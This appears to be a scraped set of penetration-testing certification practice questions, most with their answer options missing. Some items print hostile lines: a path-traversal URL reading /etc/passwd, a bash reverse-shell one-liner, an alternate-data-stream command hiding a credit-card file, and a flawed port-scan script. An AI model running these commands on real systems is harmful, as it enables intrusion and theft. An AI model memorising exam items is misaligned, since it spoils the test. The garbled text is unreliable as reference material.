Question217: A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)

B)

C)

D)

Question218: Consumer-based IoT devices are often less secure than systems built for traditional desktop computers.
Which of the following BEST describes the reasoning for this?

Question219: Which of the following has a direct and significant impact on the budget of the security assessment?

Question220: A penetration tester entered the following information into the browser URL:
https://www.example.com/login.php?file=../../../../../../../etc/passwd
The server responded with the data contained in the server's sensitive data file. Which of the following types of vulnerabilities is MOST likely being exploited?

Question221: In which of the following scenarios would a tester perform a Kerberoasting attack?

Question222: A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?

Question223: A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

Question224: Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Question225: Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Question226: An assessor begins an internal security test of the Windows domain internal. comptia. net. The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers?
A)

B)

C)

D)

Question227: A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

Question228: A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?

Question229: A penetration testet is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network The (ester is monitoring the correct channel tor the identified network but has been unsuccessful in capturing a handshake Given this scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

Question230: A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:
* Code review
* Updates to firewall setting

Question231: Given the following Python script:
#1/usr/bin/python
import socket as skt
for port in range (1,1024):
try:
sox=skt.socket(skt.AF.INET,skt.SOCK_STREAM)
sox.settimeout(1000)
sox.connect (('127.0.0.1', port))
print '%d:OPEN' % (port)
sox.close
except: continue
Which of the following is where the output will go?

Question232: A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?

Question233: A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

Question234: A penetration tester is connected to a client's local network and wants to passively identify cleartext protocols and potentially sensitive data being communicated across the network. Which of the following is the BEST approach to take?

Question235: Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?

Question236: Joe, a penetration tester, was able to exploit a web application behind a firewall He is trying to get a reverse shell back to his machine but the firewall blocks the outgoing traffic Ports for which of the following should the security consultant use to have the HIGHEST chance to bypass the firewall?

Question237: Which of the following tools is used to perform a credential brute force attack?

Question238: During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement.
Which of the following is the MOST likely reason why the engagement may not be able to continue?

Question239: During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?

Question240: A web application scanner reports that a website is susceptible to clickjacking. Which of the following techniques would BEST prove exploitability?

Question241: A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester's source IP addresses should be whitelisted?

Question242: An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email m to obtain the CEO s login credentials Which of the following types of attacks is this an example of?

Question243: A tester intends to run the following command on a target system:
bash -i >& /dev/tcp/10.2.4.6/443 0> &1
Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?

Question244: During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command:
c: \creditcards.db>c:\winit\system32\calc.exe:creditcards.db
Which of the following file system vulnerabilities does this command take advantage of?

Question245: Instructions:
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

Question246: A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system Which of the following commands should the tester run on the compromised system?

Question247: Which of the following properties of the penetration testing engagement agreement will have the largest impact on observing and testing production systems at their highest loads?